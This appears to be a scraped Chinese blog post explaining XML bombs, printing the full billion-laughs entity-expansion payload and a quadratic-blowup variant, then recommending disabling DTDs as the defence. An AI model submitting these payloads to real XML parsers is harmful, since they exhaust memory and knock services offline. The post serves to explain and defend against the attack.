XML炸彈
XML炸彈
XML document type definition (DTD)能夠定義entity,DTD能夠出如今外部文件或文件內部。
利用DTD能夠產生XML炸彈,也就是能迅速佔用大量內存的文件,以下爲例:
當XML解析器嘗試解析該文件時,因爲DTD的定義指數級展開,這個1K不到的文件會佔用到3G的內存。spa
|
1
2
3
4
5
6
7
8
9
10
11
12
13
|
<?xml version=
"1.0"
?>
<!DOCTYPE lolz [
<!ENTITY lol
"lol"
>
<!ENTITY lol2
"&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;"
>
<!ENTITY lol3
"&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;"
>
<!ENTITY lol4
"&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;"
>
<!ENTITY lol5
"&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;"
>
<!ENTITY lol6
"&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;"
>
<!ENTITY lol7
"&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;"
>
<!ENTITY lol8
"&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;"
>
<!ENTITY lol9
"&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;"
>
]>
<lolz>&lol9;</lolz>
|
還有一種,雖然擴展率沒那麼大,也頗有效。200K的可以擴展到2.5G。code
|
1
2
3
4
5
|
<?xml version=
"1.0"
?>
<!DOCTYPE kaboom [
<!ENTITY a
"aaaaaaaaaaaaaaaaaa..."
>
]>
<kaboom>&a;&a;&a;&a;&a;&a;&a;&a;&a;...</kaboom>
|
防護XML炸彈
禁止DTDxml
相關文章
- 1. 【Unity2DMobileGame06】—— 製作炸彈以及炸彈的爆炸效果
- 2. P5025 [SNOI2017]炸彈
- 3. 炸彈人
- 4. 引爆炸彈
- 5. bzoj5017 [Snoi2017]炸彈
- 6. 時間炸彈
- 7. [Snoi2017]炸彈
- 8. 星系炸彈
- 9. shell炸彈
- 10. 【dfs】引爆炸彈
- 更多相關文章...
- • jQuery Mobile 彈窗 - jQuery Mobile 教程
- • XML - E4X - XML 教程
- • TiDB 在摩拜單車在線數據業務的應用和實踐
- • NewSQL-TiDB相關
相關標籤/搜索
每日一句
-
每一个你不满意的现在,都有一个你没有努力的曾经。
歡迎關注本站公眾號,獲取更多信息
相關文章
- 1. 【Unity2DMobileGame06】—— 製作炸彈以及炸彈的爆炸效果
- 2. P5025 [SNOI2017]炸彈
- 3. 炸彈人
- 4. 引爆炸彈
- 5. bzoj5017 [Snoi2017]炸彈
- 6. 時間炸彈
- 7. [Snoi2017]炸彈
- 8. 星系炸彈
- 9. shell炸彈
- 10. 【dfs】引爆炸彈